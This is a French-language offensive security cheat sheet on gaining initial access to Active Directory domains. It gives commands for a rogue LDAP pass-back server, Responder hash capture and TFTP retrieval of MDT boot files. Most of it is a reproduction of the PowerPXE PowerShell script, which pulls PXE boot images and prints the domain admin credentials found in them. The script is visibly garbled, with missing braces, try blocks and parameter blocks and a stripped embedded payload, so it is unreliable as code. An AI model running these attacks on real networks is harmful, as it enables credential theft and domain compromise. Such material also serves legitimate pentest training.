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[AD] Initial Access


Les techniques pour obtenir un accès initial au domaine ne manquent pas avec Active Directory.

Nous étudierons quelques techniques dans cette fiche.


LDAP Pass-back attack

Cette attaque part du principe que vous ayez accès à une application capable d'établir des connexions LDAP pour authentifier les utilisateurs.

Par exemple, il peut s'agir d'un interface web de gestion d'imprimante que vous auriez compromis.

Si un combo identifiant/mot de passe est sauvegardé dans l'application mais que vous en avez pas l'accès, vous allez pouvoir mettre en place un serveur LDAP malveillant et faire pointer l'application dessus lors de l'authentification pour récupérer les identifiants.

Tout d'abord installez un serveur LDAP :

sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd

Il vous faut ensuite configurer le serveur LDAP :

sudo dpkg-reconfigure -p low slapd


Le nom du domaine DNS va vous être demandé (mettre celui que vous souhaitez compromettre) :


Le saisir de nouveau :


Sélectionnez MDB comme base de donnée :




Il faut ensuite descendre la version du protocole d'authentification LDAP. Pour cela on doit créer un fichier de configuration olcSaslSecProps.ldif :

dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

 Puis on applique cette configuration :

sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart

On peut ensuite se mettre en écoute avec tcpdump pour intercepter le mot de passe lors de la prochaine requête :

sudo tcpdump -SX -i breachad tcp port 389

Capture des challenges NTLM

Grâce à l'outil Responder, on va pouvoir récupérer le hash NTLM des hôtes sur le réseau en empoisonnant le cache LLMNR :

sudo responder -I <IFACE>

Vous serez averti si l'attaque réussie :

[+] Listening for events...
[SMBv2] NTLMv2-SSP Client   : <Client IP>
[SMBv2] NTLMv2-SSP Username : ZA\<Service Account Username>
[SMBv2] NTLMv2-SSP Hash     : <Service Account Username>::ZA:<NTLMv2-SSP Hash>

Récupération de mot de passe dans l'image MDT

Les images MDT peuvent contenir des informations d'identifications précieuses et il est possible de les récupérer si vous êtes sur le même réseau local.

Pour cela, nous allons utiliser une machine Windows et commencer par identifier l'adresse IP du serveur MDT.

Ensuite, il faut récupérer l'image .bcd qui nous intéresse grâce au protocole TFTP (utilisé par MDT) :

tftp -i <MDT_IP> GET "\Tmp\x64{39...28}.bcd" conf.bcd

Ensuite, saisissez le script suivant dans un fichier .ps1 :



    ## Author: Remi ESCOURROU @remiescourrou
    ## Name : PowerPXE
    ## Github :
    ## License : MIT    

# Find and extract credentials from PXE server
function Get-PXEcreds {

        [String]$InterfaceAlias = "Ethernet"

    Add-Type -AssemblyName System.DirectoryServices.AccountManagement

    $PxeInfo = Find-BcdFile -InterfaceAlias $InterfaceAlias
    $BCDfile =  ($PxeInfo.Options | Where-Object {$_.OptionCode -eq "252" }).OptionValue
    $PXEadress = $PXEInfo.SIAddr
    $BCDoutput = "conf.bcd"
    $BCDfileclean = $BCDfile.Substring(0,$BCDfile.Length-1)
    Download-TFTP -tftpserver $PXEadress -tftpfile $BCDfileclean -tftpoutput $BCDoutput

    $WimFiles = Get-WimFile -bcdFile $BCDoutput
    Foreach ($WimFile in $WimFiles) {
        $WimOutput = Split-Path $WimFile -Leaf
        Download-TFTP -tftpserver $PXEadress -tftpfile $WimFile -tftpoutput $WimOutput
        Get-FindCredentials -WimFile $WimOutput


# Import TFTP.NET
Function Import-TFTP {

    ## Auhtor : Valks
    ## Name : TFTP.NET
    ## Github :
    ## License : Microsoft Public License
$EncodedCompressedFile = @'
    $DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress)
    $UncompressedFileBytes = New-Object Byte[](37888)
    $DeflatedStream.Read($UncompressedFileBytes, 0, 37888) | Out-Null
    [Reflection.Assembly]::Load($UncompressedFileBytes) | Out-Null
# Download file with TFTP
function Download-TFTP {

    # $global:TransferFinishedEvent = New-object System.Threading.AutoResetEvent($False)

    $pwd = Get-Location
    $tftpoutputfull = "$pwd\$tftpoutput"
    Write-Host ">> Launch TFTP download"
    $client = New-Object Tftp.Net.TftpClient($tftpserver)
    $transfer = $client.Download($tftpfile)
    $transfer.TransferMode = "octet"   
    # $transfer.OnFinished += ????

    $stream = [System.IO.StreamWriter]::new($tftpoutputfull)
    # Must be perfrom with OnFinished event ... 
        Sleep 5
    }While( (Get-Item $tftpoutputfull).Length  -lt $transfer.ExpectedSize )
    # $TransferFinishedEvent.WaitOne()

# Export wim path from bcd
Function Get-WimFile {

    Write-Host ">> Parse the BCD file:" $bcdFile
    $BCDStore = Get-BCDStore -FilePath $bcdFile
    $BCDObjets = $BCDStore | Get-BCDObject -Type 270532611
    $CimMethodargs = @{}

    Foreach ($BCDObjet in $BCDObjets){
        $WimFiles += (Invoke-CimMethod -InputObject $BCDObjet -MethodName EnumerateElements $CimMethodargs).Elements.device.Path
        Write-Host ">>>> Identify wim file :" ((Invoke-CimMethod -InputObject $BCDObjet -MethodName EnumerateElements $CimMethodargs).Elements.device.Path | unique)
    return $WimFiles | unique

# Detect bcd file on PXE server
Function Find-BcdFile {


    # Main
    # Define DHCP Transaction ID 
    $XID = New-Object Byte[] 4
    $Random = New-Object Random

    Write-Host ">> Get a valid IP adress"

        # Craft and send DHCP Discover 
        $Message = New-DhcpDiscoverPacket -XID $XID
        # Set UDP Port 68 (Server-to-Client port)
        $BindEndPoint = [Net.EndPoint](New-Object Net.IPEndPoint($([Net.IPAddress]::Any, 68)))
        # Set UDP Port 67 (Client-to-Server port)
        $SendEndPoint = [Net.EndPoint](New-Object Net.IPEndPoint($([Net.IPAddress]::Broadcast, 67)))
        $PXEInfo = Send-DhcpPacket -Message $Message -BindEndPoint $BindEndPoint -SendEndPoint $SendEndPoint
        Write-Host ">>> >>> DHCP proposal IP address:" $PXEInfo.YIAddr
        # Craft and send DHCP Request IP Packet
        $Message2 = New-DhcpDiscoverPacket -XID $XID -PXEinfo $PXEInfo
        $PXEInfo2 = Send-DhcpPacket -Message $Message2 -BindEndPoint $BindEndPoint -SendEndPoint $SendEndPoint

        Write-Host ">>> >>> DHCP Validation:" ($PXEInfo2.Options | Where-Object {$_.OptionCode -eq "53" }).OptionValue

    } While (($PXEInfo2.Options | Where-Object {$_.OptionCode -eq "53" }).OptionValue -ne "DHCPACK")
        $adapter = Get-NetAdapter -Name $InterfaceAlias
        If (($adapter | Get-NetIPConfiguration).IPv4Address.IPAddress) {
            $adapter | Remove-NetIPAddress -Confirm:$false
        If (($adapter | Get-NetIPConfiguration).Ipv4DefaultGateway) {
            $adapter | Remove-NetRoute -Confirm:$false
        $IP = $PXEInfo2.YIAddr
        $PrefixLength = Convert-RvNetSubnetMaskClassesToCidr ($PXEInfo2.Options | Where-Object {$_.OptionCode -eq "1" }).OptionValue
        $DefaultGateway = ($PXEInfo2.Options | Where-Object {$_.OptionCode -eq "3" }).OptionValue
            $null = $adapter | New-NetIPAddress -AddressFamily "IPv4" -IPAddress $IP -PrefixLength $PrefixLength -DefaultGateway $DefaultGateway -Confirm:$false
            $null = $adapter | New-NetIPAddress -AddressFamily "IPv4" -IPAddress $IP -PrefixLength $PrefixLength -DefaultGateway $PXEInfo.SIAddr -Confirm:$false
        Write-Host ">>> >>> IP address configured:" ($adapter | Get-NetIPConfiguration).IPv4Address.IPAddress
        Sleep 20
        Write-Host ">> Request BCD File path"
        # Craft and send DHCP Request for BCD Packet
        $Message3 = New-DhcpRequestPacket  -PXEinfo $PXEInfo

        # UDP Port 68 (Server-to-Client port)    
        $BindEndPoint3 = [Net.EndPoint](New-Object Net.IPEndPoint($([Net.IPAddress]($PXEInfo.YIAddr), 68)))
        # UDP Port 4011 (Client-to-Server port)    
        $SendEndPoint3 = [Net.EndPoint](New-Object Net.IPEndPoint($([Net.IPAddress]($PXEInfo.SIAddr), 4011)))

        $PXEInfo3 = Send-DhcpPacket -Message $Message3 -BindEndPoint $BindEndPoint3 -SendEndPoint $SendEndPoint3

        $SourceFile = ($PXEInfo3.Options | Where-Object {$_.OptionCode -eq "252" }).OptionValue
        Write-Host ">>> >>> BCD File path: " $SourceFile
        Write-Host ">>> >>> TFTP IP Address: " $PXEInfo3.SIAddr
    return $PXEInfo3

# Find credentials inside *.ini files
Function Get-FindCredentials {

    Write-Host ">> Open" $WimFile
    $pwd = Get-Location
    $WimFile = "$pwd\$WimFile"
    $WimDir = $WimFile.split(".")[0]
    $null = New-Item -ItemType directory -Path $WimDir
    $null = Expand-WindowsImage -ImagePath $WimFile -Index 1 -ApplyPath $WimDir
    $BootstrapPath = (Get-ChildItem -Filter "Bootstrap.ini" -r -ea Silent).FullName
        Write-Host ">>>> Finding Bootstrap.ini"
        $Bootstrap = Get-IniContent $BootstrapPath
        Write-Host ">>>> >>>> DeployRoot =" $Bootstrap.Default.DeployRoot
        Write-Host ">>>> >>>> UserID =" $Bootstrap.Default.UserID
        Write-Host ">>>> >>>> UserDomain =" $Bootstrap.Default.UserDomain
        Write-Host ">>>> >>>> UserPassword =" $Bootstrap.Default.UserPassword
        # Test-Authentification -Domain $Bootstrap.Default.UserDomain -UserName $Bootstrap.Default.UserID -Password $Bootstrap.Default.UserPassword
    $CustomSettingsPath = (Get-ChildItem -Filter "CustomSettings.ini" -r -ea Silent).FullName
        Write-Host ">>>> Finding CustomSettings.ini"
        $CustomSettings = Get-IniContent $CustomSettingsPath
        Write-Host ">>>> >>>> DomainAdmin =" $CustomSettings.Default.DomainAdmin
        Write-Host ">>>> >>>> DomainAdminDomain =" $CustomSettings.Default.DomainAdminDomain
        Write-Host ">>>> >>>> DomainAdminpassword =" $CustomSettings.Default.DomainAdminpassword

        # Test-Authentification -Domain $CustomSettings.Default.DomainAdminDomain -UserName $CustomSettings.Default.DomainAdmin -Password $CustomSettings.Default.DomainAdminpassword


# Test some credentials 
Function Test-Authentification {

    $ct = [System.DirectoryServices.AccountManagement.ContextType]::Domain
    $pc = New-Object System.DirectoryServices.AccountManagement.PrincipalContext $ct,$Domain
        $test = "ok"
        Write-Host ">>>> >>>> >>>> Credential testing: OK" -Foregroundcolor Green
        Write-Host ">>>> >>>> >>>> Credential testing: NOK" -Collor Red

    ## Adaptation & Inspiration from
    ## Author: Chris Dent
    ## Name : DHCP Discovery
    ## Link :

# Create a DHCP Discover Packet
Function New-DhcpDiscoverPacket{
    [String]$MacAddressString = "AA:BB:CC:DD:EE:FC",
    # Create the Byte Array
    $DhcpDiscover = New-Object Byte[] 243
    # Convert the MAC Address String into a Byte Array
    # Drop any characters which might be used to delimit the string
    $MacAddressString = $MacAddressString -Replace "-|:" 
    $MacAddress = [BitConverter]::GetBytes(([UInt64]::Parse($MacAddressString,[Globalization.NumberStyles]::HexNumber)))
    # Copy the MacAddress Bytes into the array (drop the first 2 bytes, 
    # too many bytes returned from UInt64)
    [Array]::Copy($MACAddress, 2, $DhcpDiscover, 28, 6)
    # Copy the Transaction ID into the array
    [Array]::Copy($XID, 0, $DhcpDiscover, 4, 4)
    # Convert the UID Address String into a Byte Array
    $UUIDString = $UUIDString -Replace "-|:" 
    $UUIDString1= $UUIDString.Substring(0,16)
    $UUIDString2= $UUIDString.Substring(16,16)
    $UUID1 = [BitConverter]::GetBytes(([UInt64]::Parse($UUIDString1,[Globalization.NumberStyles]::HexNumber)))
    $UUID2 = [BitConverter]::GetBytes(([UInt64]::Parse($UUIDString2,[Globalization.NumberStyles]::HexNumber)))
    $UUID = $UUID1 + $UUID2

    # Set the OP Code to BOOTREQUEST
    $DhcpDiscover[0] = 1
    # Set the Hardware Address Type to Ethernet
    $DhcpDiscover[1] = 1
    # Set the Hardware Address Length (number of bytes)
    $DhcpDiscover[2] = 6
    # Set the Broadcast Flag
    $DhcpDiscover[10] = 128
    # Set the Magic Cookie values
    $DhcpDiscover[236] = 99
    $DhcpDiscover[237] = 130
    $DhcpDiscover[238] = 83
    $DhcpDiscover[239] = 99
    # Set the DHCPDiscover Message Type Option 53
    $DhcpDiscover[240] = 53
    $DhcpDiscover[241] = 1
    $DhcpDiscover[242] = 1

    # Set the Option #55 : Parameter Request List
    $DhcpDiscover_Option55 = New-Object Byte[] 38
    $DhcpDiscover_Option55[0] = 55
    $DhcpDiscover_Option55[1] = 36
    $DhcpDiscover_Option55[2] = 1
    $DhcpDiscover_Option55[3] = 2
    $DhcpDiscover_Option55[4] = 3
    $DhcpDiscover_Option55[5] = 4
    $DhcpDiscover_Option55[6] = 5
    $DhcpDiscover_Option55[7] = 6
    $DhcpDiscover_Option55[8] = 11
    $DhcpDiscover_Option55[9] = 12
    $DhcpDiscover_Option55[10] = 13
    $DhcpDiscover_Option55[11] = 15
    $DhcpDiscover_Option55[12] = 16
    $DhcpDiscover_Option55[13] = 17
    $DhcpDiscover_Option55[14] = 18
    $DhcpDiscover_Option55[15] = 22
    $DhcpDiscover_Option55[16] = 23
    $DhcpDiscover_Option55[17] = 28
    $DhcpDiscover_Option55[18] = 40
    $DhcpDiscover_Option55[19] = 41
    $DhcpDiscover_Option55[20] = 42
    $DhcpDiscover_Option55[21] = 43
    $DhcpDiscover_Option55[22] = 50
    $DhcpDiscover_Option55[23] = 51
    $DhcpDiscover_Option55[24] = 54
    $DhcpDiscover_Option55[25] = 58
    $DhcpDiscover_Option55[26] = 59
    $DhcpDiscover_Option55[27] = 60
    $DhcpDiscover_Option55[28] = 66
    $DhcpDiscover_Option55[29] = 67
    $DhcpDiscover_Option55[30] = 128
    $DhcpDiscover_Option55[31] = 129
    $DhcpDiscover_Option55[32] = 130
    $DhcpDiscover_Option55[33] = 131
    $DhcpDiscover_Option55[34] = 132
    $DhcpDiscover_Option55[35] = 133
    $DhcpDiscover_Option55[36] = 134
    $DhcpDiscover_Option55[37] = 135
    $DhcpDiscover = $DhcpDiscover + $DhcpDiscover_Option55 

    # Set the Option #57 : Maximum DHCP Message Size
    $DhcpDiscover_Option57 = New-Object Byte[] 4
    $DhcpDiscover_Option57[0] = 57
    $DhcpDiscover_Option57[1] = 2
    $DhcpDiscover_Option57[2] = 4
    $DhcpDiscover_Option57[3] = 236
    $DhcpDiscover = $DhcpDiscover + $DhcpDiscover_Option57
    # Set the Option #60
    $Option60String = "PXEClient"
    $DhcpDiscover_Option60 = New-Object Byte[] 2
    $DhcpDiscover_Option60[0] = 60
    $DhcpDiscover_Option60[1] = [System.Text.Encoding]::ASCII.GetBytes($Option60String).Length;
    $Option60Array = [System.Text.Encoding]::ASCII.GetBytes($Option60String);
    $DhcpDiscover_Option60 = $DhcpDiscover_Option60 + $Option60Array;
    $DhcpDiscover = $DhcpDiscover + $DhcpDiscover_Option60;

    # Set the Option #93 : Client System Architecture
    $DhcpDiscover_Option93 = New-Object Byte[] 4
    $DhcpDiscover_Option93[0] = 93
    $DhcpDiscover_Option93[1] = 2
    $DhcpDiscover_Option93[2] = 0
    $DhcpDiscover_Option93[3] = 0 # IA x86 PC
    $DhcpDiscover = $DhcpDiscover + $DhcpDiscover_Option93
    # Set the Option #97 : Client Identifier
    $DhcpDiscover_Option97 = New-Object Byte[] 3
    $DhcpDiscover_Option97[0] = 97
    $DhcpDiscover_Option97[1] = 17
    $DhcpDiscover_Option97[2] = 0
    $DhcpDiscover = $DhcpDiscover + $DhcpDiscover_Option97 + $UUID
        # Set the DHCP Request Message Type Option 53
        $DhcpDiscover[240] = 53
        $DhcpDiscover[241] = 1
        $DhcpDiscover[242] = 3
        # Set the Option #54 : DHCP Identifier
        $DHCPIdentifierString = ($PxeInfo.Options | Where {$_.OptionName -contains "DhcpServerIdentifier"}).OptionValue
        $DHCPIdentifier = $DHCPIdentifierString.Split(".")

        $DhcpDiscover_Option54 = New-Object Byte[] 6
        $DhcpDiscover_Option54[0] = 54
        $DhcpDiscover_Option54[1] = 4
        $DhcpDiscover_Option54[2] = $DHCPIdentifier[0]
        $DhcpDiscover_Option54[3] = $DHCPIdentifier[1]
        $DhcpDiscover_Option54[4] = $DHCPIdentifier[2]
        $DhcpDiscover_Option54[5] = $DHCPIdentifier[3]
        $DhcpDiscover = $DhcpDiscover + $DhcpDiscover_Option54
        # Set the Option #50 : Requested Ip Address
        $YIAddr = ($PxeInfo.YIAddr).Split(".")
        $DhcpDiscover_Option50 = New-Object Byte[] 6
        $DhcpDiscover_Option50[0] = 50
        $DhcpDiscover_Option50[1] = 4
        $DhcpDiscover_Option50[2] = $YIAddr[0]
        $DhcpDiscover_Option50[3] = $YIAddr[1]
        $DhcpDiscover_Option50[4] = $YIAddr[2]
        $DhcpDiscover_Option50[5] = $YIAddr[3]
        $DhcpDiscover = $DhcpDiscover + $DhcpDiscover_Option50
    # Set the end
    $DhcpDiscover_Option255 = New-Object Byte[] 1
    $DhcpDiscover_Option255[0] = 255
    $DhcpDiscover = $DhcpDiscover + $DhcpDiscover_Option255
    Return $DhcpDiscover
# Create a DHCP Request Packet for BCD file 
Function New-DhcpRequestPacket{
        [String]$MacAddressString = "AA:BB:CC:DD:EE:FC",

    # Create the Byte Array
    $DhcpDiscover = New-Object Byte[] 241
    # Convert the MAC Address String into a Byte Array
    # Drop any characters which might be used to delimit the string
    $MacAddressString = $MacAddressString -Replace "-|:" 
    $MacAddress = [BitConverter]::GetBytes(([UInt64]::Parse($MacAddressString,[Globalization.NumberStyles]::HexNumber)))
    # Copy the MacAddress Bytes into the array (drop the first 2 bytes, 
    # too many bytes returned from UInt64)
    [Array]::Copy($MACAddress, 2, $DhcpDiscover, 28, 6)

    # Copy the Transaction ID Bytes into the array
    $ID = "{0:x}" -f $PXEInfo.XID
    $ID = [BitConverter]::GetBytes(([UInt64]::Parse($ID,[Globalization.NumberStyles]::HexNumber)))
    [Array]::Copy($ID, 0, $DhcpDiscover, 4, 4)
    # Copy the client UID into the array
    # Drop any characters which might be used to delimit the string
    $UUIDString = $UUIDString -Replace "-|:" 
    $UUIDString1= $UUIDString.Substring(0,16)
    $UUIDString2= $UUIDString.Substring(16,16)
    $UUID1 = [BitConverter]::GetBytes(([UInt64]::Parse($UUIDString1,[Globalization.NumberStyles]::HexNumber)))
    $UUID2 = [BitConverter]::GetBytes(([UInt64]::Parse($UUIDString2,[Globalization.NumberStyles]::HexNumber)))
    $UUID = $UUID1 + $UUID2

    # Set the OP Code to BOOTREQUEST
    $DhcpDiscover[0] = 1
    # Set the Hardware Address Type to Ethernet
    $DhcpDiscover[1] = 1
    # Set the Hardware Address Length (number of bytes)
    $DhcpDiscover[2] = 6
    # Set the Broadcast Flag
    $DhcpDiscover[10] = 0
    # Set the IP Client
    $ArrayYIAddr = $PXEInfo.YIAddr.Split(".")
    $DhcpDiscover[12] = $ArrayYIAddr[0]
    $DhcpDiscover[13] = $ArrayYIAddr[1]
    $DhcpDiscover[14] = $ArrayYIAddr[2]
    $DhcpDiscover[15] = $ArrayYIAddr[3]
    # Set the Magic Cookie values
    $DhcpDiscover[236] = 99
    $DhcpDiscover[237] = 130
    $DhcpDiscover[238] = 83
    $DhcpDiscover[239] = 99
    # Set the Option #53 : DHCP Message Type
    $DhcpDiscover_Option53 = New-Object Byte[] 3
    $DhcpDiscover_Option53[0] = 53
    $DhcpDiscover_Option53[1] = 1
    $DhcpDiscover_Option53[2] = 3
    $DhcpDiscover = $DhcpDiscover + $DhcpDiscover_Option53

    # Set the Option #55 : Parameter Request List
    $DhcpDiscover_Option55 = New-Object Byte[] 15
    $DhcpDiscover_Option55[0] = 55
    $DhcpDiscover_Option55[1] = 13
    $DhcpDiscover_Option55[2] = 3
    $DhcpDiscover_Option55[3] = 1
    $DhcpDiscover_Option55[4] = 60
    $DhcpDiscover_Option55[5] = 66
    $DhcpDiscover_Option55[6] = 67
    $DhcpDiscover_Option55[7] = 128
    $DhcpDiscover_Option55[8] = 129
    $DhcpDiscover_Option55[9] = 130
    $DhcpDiscover_Option55[10] = 131
    $DhcpDiscover_Option55[11] = 132
    $DhcpDiscover_Option55[12] = 133
    $DhcpDiscover_Option55[13] = 134
    $DhcpDiscover_Option55[14] = 135
    $DhcpDiscover = $DhcpDiscover + $DhcpDiscover_Option55
    # Set the Option #60
    $Option60String = "PXEClient"
    $DhcpDiscover_Option60 = New-Object Byte[] 2
    $DhcpDiscover_Option60[0] = 60
    $DhcpDiscover_Option60[1] = [System.Text.Encoding]::ASCII.GetBytes($Option60String).Length;
    $Option60Array = [System.Text.Encoding]::ASCII.GetBytes($Option60String);
    $DhcpDiscover_Option60 = $DhcpDiscover_Option60 + $Option60Array;
    $DhcpDiscover = $DhcpDiscover + $DhcpDiscover_Option60;

    # Set the Option #93 : Client System Architecture
    $DhcpDiscover_Option93 = New-Object Byte[] 4
    $DhcpDiscover_Option93[0] = 93
    $DhcpDiscover_Option93[1] = 2
    $DhcpDiscover_Option93[2] = 0
    $DhcpDiscover_Option93[3] = 0 # IA x86 PC
    $DhcpDiscover = $DhcpDiscover + $DhcpDiscover_Option93

    # Set the Option #97 : Client Identifier
    $DhcpDiscover_Option97 = New-Object Byte[] 3
    $DhcpDiscover_Option97[0] = 97
    $DhcpDiscover_Option97[1] = 17
    $DhcpDiscover_Option97[2] = 0
    $DhcpDiscover = $DhcpDiscover + $DhcpDiscover_Option97 + $UUID
    # Set the Option #250 : Some kind of Architecture ?! 
    # Used by SCCM to obtain correct BCD
    # Option 250 example: 0c 01 01 0d 02 08 00 0e 01 00 01 02 00 06 ff

    # Another Option 250 example: 0d 02 08 00 0e 01 01 01 02 00 06 05 04 00 00 00 02 ff
    # If someone have an idea to generate it ???

    # Set the Option #250 : Some kind of Architecture ?!
    # $DhcpDiscover_Option250 = New-Object Byte[] 14
    # $DhcpDiscover_Option250[0] = 0
    # $DhcpDiscover_Option250[1] = 0
    # $DhcpDiscover_Option250[2] = 0
    # $DhcpDiscover_Option250[3] = 0
    # $DhcpDiscover_Option250[4] = 0
    # $DhcpDiscover_Option250[5] = 0
    # $DhcpDiscover_Option250[6] = 0
    # $DhcpDiscover_Option250[7] = 0
    # $DhcpDiscover_Option250[8] = 0
    # $DhcpDiscover_Option250[9] = 0
    # $DhcpDiscover_Option250[10] = 0
    # $DhcpDiscover_Option250[11] = 0
    # $DhcpDiscover_Option250[12] = 0
    # $DhcpDiscover_Option250[13] = 0
    # $DhcpDiscover = $DhcpDiscover + $DhcpDiscover_Option250
    # Set the end
    $DhcpDiscover_Option255 = New-Object Byte[] 1
    $DhcpDiscover_Option255[0] = 255
    $DhcpDiscover = $DhcpDiscover + $DhcpDiscover_Option255

    Return $DhcpDiscover

# Send a DHCP Packet
Function Send-DhcpPacket{

        [Byte]$DiscoverTimeout = 255
    # Create a socket
    $UdpSocket = New-UdpSocket

    # Listen on $EndPoint

    # Send the DHCPDISCOVER packet   
    Write-Host ">>> Sending DHCP packet"
    $BytesSent = $UdpSocket.SendTo($Message, $SendEndPoint)
    # Begin receiving and processing responses
    $NoConnectionTimeOut = $True
    $Start = Get-Date
    Write-Host ">>> Beginning reception"

    While ($NoConnectionTimeOut){
        $BytesReceived = 0
            # Placeholder EndPoint for the Sender
            $SenderEndPoint = [Net.EndPoint](New-Object Net.IPEndPoint($([Net.IPAddress]::Any, 0)))
            # Receive Buffer
            $ReceiveBuffer = New-Object Byte[] 1024
            $BytesReceived = $UdpSocket.ReceiveFrom($ReceiveBuffer, [Ref]$SenderEndPoint)
            If ($BytesReceived -lt 1024){
                $NoConnectionTimeOut = $False

        Catch [Net.Sockets.SocketException]{
            # Catch a SocketException, thrown when the Receive TimeOut value is reached
            $NoConnectionTimeOut = $False

        If ($BytesReceived -gt 0){
            $PXEInfo = Read-DhcpPacket $ReceiveBuffer[0..$BytesReceived]

        # Exit condition, not error condition
        If ((Get-Date) -gt $Start.AddSeconds($DiscoverTimeout)){
            $NoConnectionTimeOut = $False

    Write-Host ">>> Reception finished"    
    Remove-Socket $UdpSocket

    Return $PXEInfo

# Parse a DHCP Packet, returning an object containing each field
Function Read-DhcpPacket( [Byte[]]$Packet ){
  $Reader = New-Object IO.BinaryReader(New-Object IO.MemoryStream(@(,$Packet)))
  $DhcpResponse = New-Object Object
  # Get and translate the Op code
  $DhcpResponse | Add-Member NoteProperty Op $Reader.ReadByte()
  if ($DhcpResponse.Op -eq 1) 
    $DhcpResponse.Op = "BootRequest" 
    $DhcpResponse.Op = "BootResponse" 
  $DhcpResponse | Add-Member NoteProperty HType -Value $Reader.ReadByte()
  if ($DhcpResponse.HType -eq 1) { $DhcpResponse.HType = "Ethernet" }
  $DhcpResponse | Add-Member NoteProperty HLen $Reader.ReadByte()
  $DhcpResponse | Add-Member NoteProperty Hops $Reader.ReadByte()
  $DhcpResponse | Add-Member NoteProperty XID $Reader.ReadUInt32()
  $DhcpResponse | Add-Member NoteProperty Secs $Reader.ReadUInt16()
  $DhcpResponse | Add-Member NoteProperty Flags $Reader.ReadUInt16()
  # Broadcast is the only flag that can be present, the other bits are reserved
  if ($DhcpResponse.Flags -BAnd 128) { $DhcpResponse.Flags = @("Broadcast") }
  $DhcpResponse | Add-Member NoteProperty CIAddr `
    $("$($Reader.ReadByte()).$($Reader.ReadByte())." + `
  $DhcpResponse | Add-Member NoteProperty YIAddr `
    $("$($Reader.ReadByte()).$($Reader.ReadByte())." + `
  $DhcpResponse | Add-Member NoteProperty SIAddr `
    $("$($Reader.ReadByte()).$($Reader.ReadByte())." + `
  $DhcpResponse | Add-Member NoteProperty GIAddr `
    $("$($Reader.ReadByte()).$($Reader.ReadByte())." + `
  $MacAddrBytes = New-Object Byte[] 16
  [Void]$Reader.Read($MacAddrBytes, 0, 16)
  $MacAddress = [String]::Join(
    ":", $($MacAddrBytes[0..5] | %{ [String]::Format('{0:X2}', $_) }))
  $DhcpResponse | Add-Member NoteProperty CHAddr $MacAddress
  $DhcpResponse | Add-Member NoteProperty SName `
    $([String]::Join("", $Reader.ReadChars(64)).Trim())
  $DhcpResponse | Add-Member NoteProperty File `
    $([String]::Join("", $Reader.ReadChars(128)).Trim())
  $DhcpResponse | Add-Member NoteProperty MagicCookie `
    $("$($Reader.ReadByte()).$($Reader.ReadByte())." + `
  # Start reading Options
  $DhcpResponse | Add-Member NoteProperty Options @()
  While ($Reader.BaseStream.Position -lt $Reader.BaseStream.Length)
    $Option = New-Object Object
    $Option | Add-Member NoteProperty OptionCode $Reader.ReadByte()
    $Option | Add-Member NoteProperty OptionName ""
    $Option | Add-Member NoteProperty Length 0
    $Option | Add-Member NoteProperty OptionValue ""
    If ($Option.OptionCode -ne 0 -And $Option.OptionCode -ne 255)
      $Option.Length = $Reader.ReadByte()
    Switch ($Option.OptionCode)
      0 { $Option.OptionName = "PadOption" }
      1 {
        $Option.OptionName = "SubnetMask"
        $Option.OptionValue = `
          $("$($Reader.ReadByte()).$($Reader.ReadByte())." + `
          "$($Reader.ReadByte()).$($Reader.ReadByte())") }
      3 {
        $Option.OptionName = "Router"
        $Option.OptionValue = `
          $("$($Reader.ReadByte()).$($Reader.ReadByte())." + `
          "$($Reader.ReadByte()).$($Reader.ReadByte())") }
      6 {
        $Option.OptionName = "DomainNameServer"
        $Option.OptionValue = @()
        For ($i = 0; $i -lt ($Option.Length / 4); $i++) 
          $Option.OptionValue += `
            $("$($Reader.ReadByte()).$($Reader.ReadByte())." + `
        } }
      15 {
        $Option.OptionName = "DomainName"
        $Option.OptionValue = [String]::Join(
          "", $Reader.ReadChars($Option.Length)) }
      51 {
        $Option.OptionName = "IPAddressLeaseTime"
        # Read as Big Endian
        $Value = ($Reader.ReadByte() * [Math]::Pow(256, 3)) + `
          ($Reader.ReadByte() * [Math]::Pow(256, 2)) + `
          ($Reader.ReadByte() * 256) + `
        $Option.OptionValue = $(New-TimeSpan -Seconds $Value) }
      53 { 
        $Option.OptionName = "DhcpMessageType"
        Switch ($Reader.ReadByte())
          1 { $Option.OptionValue = "DHCPDISCOVER" }
          2 { $Option.OptionValue = "DHCPOFFER" }
          3 { $Option.OptionValue = "DHCPREQUEST" }
          4 { $Option.OptionValue = "DHCPDECLINE" }
          5 { $Option.OptionValue = "DHCPACK" }
          6 { $Option.OptionValue = "DHCPNAK" }
          7 { $Option.OptionValue = "DHCPRELEASE" }
        } }
      54 {
        $Option.OptionName = "DhcpServerIdentifier"
        $Option.OptionValue = `
          $("$($Reader.ReadByte()).$($Reader.ReadByte())." + `
          "$($Reader.ReadByte()).$($Reader.ReadByte())") }
      58 {
        $Option.OptionName = "RenewalTime"
        # Read as Big Endian
        $Value = ($Reader.ReadByte() * [Math]::Pow(256, 3)) + `
          ($Reader.ReadByte() * [Math]::Pow(256, 2)) + `
          ($Reader.ReadByte() * 256) + `
        $Option.OptionValue = $(New-TimeSpan -Seconds $Value) }
      59 {
        $Option.OptionName = "RebindingTime"
        # Read as Big Endian
        $Value = ($Reader.ReadByte() * [Math]::Pow(256, 3)) + `
          ($Reader.ReadByte() * [Math]::Pow(256, 2)) + `
          ($Reader.ReadByte() * 256) + `
        $Option.OptionValue = $(New-TimeSpan -Seconds $Value) }
      67 {
        $Option.OptionName = "vendor-class-identifier"
        # Read as Big Endian
        $Value = ($Reader.ReadByte() * [Math]::Pow(256, 3)) + `
          ($Reader.ReadByte() * [Math]::Pow(256, 2)) + `
          ($Reader.ReadByte() * 256) + `
        $Option.OptionValue = $(New-TimeSpan -Seconds $Value) }
      252 {
        $Option.OptionName = "Private / autodiscovery"
        $Option.OptionValue = [String]::Join(
          "", $Reader.ReadChars($Option.Length)) }
      255 { $Option.OptionName = "EndOption" }
      default {
        # For all options which are not decoded here
        $Option.OptionName = "NoOptionDecode"
        $Buffer = New-Object Byte[] $Option.Length
        [Void]$Reader.Read($Buffer, 0, $Option.Length)
        $Option.OptionValue = $Buffer
    # Override the ToString method
    $Option | Add-Member ScriptMethod ToString `
        { Return "$($this.OptionName) ($($this.OptionValue))" } -Force
    $DhcpResponse.Options += $Option
    Return $DhcpResponse 
# Create a UDP Socket with Broadcast and Address Re-use enabled. 
Function New-UdpSocket{
